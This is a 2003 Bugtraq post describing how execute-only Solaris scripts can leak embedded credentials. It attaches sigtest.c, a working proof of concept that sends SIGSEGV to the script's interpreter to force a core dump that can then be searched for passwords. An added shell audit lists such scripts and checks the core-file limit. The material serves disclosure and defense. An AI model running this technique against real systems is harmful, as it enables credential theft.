Date: Wed, 12 Feb 2003 03:21:49 +0000 (GMT)
From: Jon Masters <jonathan@jonmasters.org>
To: bugtraq@securityfocus.com
Subject: Solaris Signals

Hi,

We all know that old chestnut about tracing setuid programs or scripts, but what about non-setuid scripts which have been installed for users and given execute-only permission? For example, a lot of sites provide scripts for users to run which perform some admin-related function and thus have usernames or passwords within them - potentially free to users.

The thing I want to do is make a few people think about fixing this by taking whatever steps are necessary on a per-installation basis. It is a silly kind of thing which seems to be overlooked all too often. There is some trivial code attached for those who really do not see my point.

This is bound to be covered somewhere, I just want to get viewpoints.

Jon.

[Attachment: sigtest.c]

/* sigtest.c
 * A quick and dirty hack for proof of concept exploit against local Solaris
 * system scripts which have +x permission without +r. This allows the user
 * to obtain a dump of the process memory space and run strings or similar
 * tool to quickly obtain useful information such as usernames and passwords.
 * Motto: catch those signals.
 *
 * Use: run the program, read the core dump. No rocket science required and
 * obviously no exploit code either given a suitable shell environment. Yes,
 * it is stupid but it does work on too many systems and needs to be fixed.
 *
 * Compile using "gcc -Wall --pedantic-errors -o sigtest sigtest.c"
 */

/* Include useful header files. */

#include <stdio.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <sys/resource.h>  /* getrlimit() and struct rlimit */
#include <stdlib.h>
#include <signal.h>

#define CHILD_ARGV_LENGTH 2
#define TRUE 1

int main(int argc, char *argv[]) {

  int child_pid = 0;
  char *child_argv[CHILD_ARGV_LENGTH];
  struct rlimit rlp;

  if (argc != 2) {
    printf("Usage:\n%s command\n", argv[0]);
    exit(1);
  }
  child_argv[0] = argv[1];

  printf("The entertainment starts here...\n");

  if ((child_pid = fork()) == 0) {

    /* Child: report the core-file limit it inherited, then exec the target. */
    if (getrlimit(RLIMIT_CORE, &rlp) != 0) {
      printf("Could not get limits.\n");
      exit(1);
    } else {
      printf("The current limit is: %d.\n", (int)rlp.rlim_cur);
    }
    printf("I am the child process and my process id is %d\n",
           (int)getpid());

    /* child_argv[0] = "./test_script.sh"; */
    child_argv[1] = NULL;
    printf("Invoking program: %s\n", child_argv[0]);
    fflush(stdout);
    if (execv(child_argv[0], child_argv) == -1) {
      printf("A descriptive error message.\n");
    }
    /* system("/bin/ls"); */ /* An alternative which forks. */
    printf("This point is never reached normally\n");
  } else {
    /* This is the horribly ugly bit where we sleep for an empirical amount of
       time. Obviously this is not the correct way to write a general purpose
       exploit - but that was not the point of this code. Go fix if you really
       have no life :-) Perhaps some sem or other process sync can go here. */
    usleep(10000);
    while (TRUE) {
      if (kill(child_pid, SIGSEGV) == 0) {
        printf("The package was delivered.\n");
        break;
      }
    }
    waitpid(child_pid, NULL, 0); /* could use wait() also. */
  }

  printf("Main program exits normally\n");
  return 0; /* return something */
}
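The post's point is that execute-only permission on a script is not a secret-keeping mechanism: the interpreter has to read the script into its own address space, and that address space can end up in a core file. As an added example (not part of Jon Masters' post or his sigtest.c), the POSIX shell functions below audit a directory tree for scripts that are executable but unreadable for group or other, and report the shell's soft core-file limit so an administrator can see whether dumps are possible at all. The directory layout built by demo() and the placeholder credential written into it are constructed for illustration.

```shell
#!/bin/sh
# Added example: find scripts that rely on "+x without +r" for secrecy and
# show the core-file limit that decides whether a crashed interpreter can
# leave its memory image on disk.

# List regular files under $1 that are executable but not readable for
# group or for other. One path per line.
find_exec_only() {
    dir=$1
    # other: x set and r clear   -o   group: x set and r clear
    find "$dir" -type f \( \( -perm -0001 ! -perm -0004 \) -o \
                           \( -perm -0010 ! -perm -0040 \) \) -print
}

# Number of such files under $1, as a plain integer.
count_exec_only() {
    find_exec_only "$1" | wc -l | tr -d ' '
}

# Soft core-file size limit for this shell; "0" means no dump can be written,
# which is the cheapest stop-gap while execute-only scripts are being removed
# or rewritten so that they do not carry credentials.
core_limit() {
    ulimit -c
}

# Demonstration on a constructed layout: one execute-only script holding a
# placeholder secret, one ordinary readable script.
demo() {
    tmp=$(mktemp -d) || return 1
    printf '#!/bin/sh\nPASSWORD=placeholder-not-a-real-secret\n' > "$tmp/backup.sh"
    chmod 0711 "$tmp/backup.sh"   # execute-only for group and other
    printf '#!/bin/sh\necho ok\n' > "$tmp/ok.sh"
    chmod 0755 "$tmp/ok.sh"       # readable; nothing to hide
    echo "execute-only scripts under $tmp:"
    find_exec_only "$tmp"
    echo "count: $(count_exec_only "$tmp")"
    echo "core file limit (soft): $(core_limit)"
    rm -rf "$tmp"
}

demo
```

Run it against the directories where site scripts are installed (for example the paths users are told to run them from) and treat every hit as a script whose contents must be assumed readable; moving the secret out of the script, or replacing the script with a privileged service the user cannot dump, is the fix, and on Solaris the coreadm(1M) configuration governs where and whether core files are written at all.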